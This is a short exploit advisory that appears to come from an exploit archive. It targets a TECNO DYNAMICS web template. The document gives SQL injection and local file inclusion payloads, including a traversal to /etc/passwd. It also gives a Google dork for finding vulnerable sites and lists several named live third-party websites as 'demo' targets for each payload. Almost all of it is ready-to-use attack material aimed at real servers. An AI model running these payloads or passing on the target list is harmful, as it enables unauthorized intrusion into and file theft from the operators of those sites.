id: 19536
date: 10/09/2012
title: TECNO DYNAMICS - Sql injection / Local File Include Vulnerabilities
author: k2ll33d
cves: 

# Exploit Title: TECNO DYNAMICS - SQL INJECTION & LFI
# Date: 08/10/2012
# Author: k2ll33d
# Vendor : http://www.tecnoglobal.com/
# Version: N/A
# Category: webapps
# Google dork: "inurl:template_home.php4 intext:Todos los Derechos Reservados"
# vuln:
            [ SQLI ]

http://localhost/template_home.php4?id=[SQLI]

# Demo sites:

http://www.tecnodefensa.com/site/template_home.php4?id=7'
http://www.expobodegas.com/site/template_home.php4?id=2'
http://www.pazdeheza.com/site/template_home.php4?id=1'
http://www.globalpymes.com/site/template_home.php4?id=15'
http://www.expovinos.com.ar/site/template_home.php4?id=1'
[+] http://www.tecnoglobal.com/site/template_home.php4?sec=16'



              [LFI]

#vuln :             
http://localhost/template_home.php4?sec=2&pag=1&url=../../../../../../../../etc/passwd

#demo :
http://www.globalpymes.com/site/template_home.php4?sec=2&pag=1&url=../../../../../../../../etc/passwd
http://www.tecnoglobal.com/site/template_home.php4?sec=2&pag=1&url=../../../../../../../../etc/passwd
http://www.tecnoandes.com/site/template_home.php4?sec=2&pag=1&url=../../../../../../../../etc/passwd



#  0day.today [2023-03-22]  #